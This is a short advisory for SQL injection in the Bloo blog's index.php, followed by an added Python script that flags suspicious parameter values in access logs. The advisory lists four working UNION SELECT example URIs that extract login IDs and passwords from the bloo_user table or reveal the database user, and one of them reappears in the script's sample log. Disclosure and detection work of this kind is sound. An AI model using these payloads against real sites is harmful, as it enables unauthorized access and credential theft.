Bloo 'index.php' Multiple SQL Injection Vulnerabilities
An attacker can exploit these issues via a browser. The following example URIs are available:

http://www.example.com/index.php?post_id=1+union+select+1,concat(login_id,char(58),password),3,4,5,6,7,8+from+bloo_user/*

http://www.example.com/index.php?post_category_id=1+union+select+1,2,3,4,concat(login_id,char(58),password),6,7,8+from+bloo_user/*

http://www.example.com/index.php?post_year_month=[NumberIdOfExistentPost]+union+select+1,2,3,4,concat(login_id,char(58),password),6,7,8+from+bloo_user/*

http://www.example.com/index.php?static_page_id=1+union+select+1,user(),3,4,5,6/*
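
A defensive check for the parameters shown in the example URIs, as an added example that is not part of the original advisory: it scans access-log lines for index.php requests whose post_id, post_category_id, post_year_month or static_page_id value is not a plain identifier. The log lines are constructed, and the accepted value formats (digits, with an optional hyphen for post_year_month) are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters named in the advisory's example URIs, with the value format
# each is ASSUMED to take in legitimate requests.
WATCHED = {
    "post_id": re.compile(r"\d+"),
    "post_category_id": re.compile(r"\d+"),
    "static_page_id": re.compile(r"\d+"),
    "post_year_month": re.compile(r"\d+(-\d+)?"),  # assumption: e.g. 2008-01
}
# Request line of a common/combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP range, made-up timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2008:10:00:00 +0000] "GET /index.php?post_id=12 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Jan/2008:10:00:05 +0000] "GET /index.php?static_page_id=1+union+select+1,user(),3,4,5,6/* HTTP/1.1" 200 4096',
    '192.0.2.10 - - [01/Jan/2008:10:00:09 +0000] "GET /index.php?post_year_month=2008-01 HTTP/1.1" 200 6000',
]

def suspicious_params(line):
    """Return [(param, decoded_value)] for watched parameters that are not plain ids."""
    m = REQUEST.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.endswith("/index.php"):
        return []
    hits = []
    # parse_qsl decodes '+' and %XX, so encoded payloads are compared in clear form.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        pattern = WATCHED.get(name)
        if pattern and not pattern.fullmatch(value):
            hits.append((name, value))
    return hits

def scan(lines):
    """Return [(line_number, hits)] for every log line with at least one hit."""
    results = []
    for number, line in enumerate(lines, start=1):
        hits = suspicious_params(line)
        if hits:
            results.append((number, hits))
    return results

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG):
        print(f"line {number}: {hits}")
```
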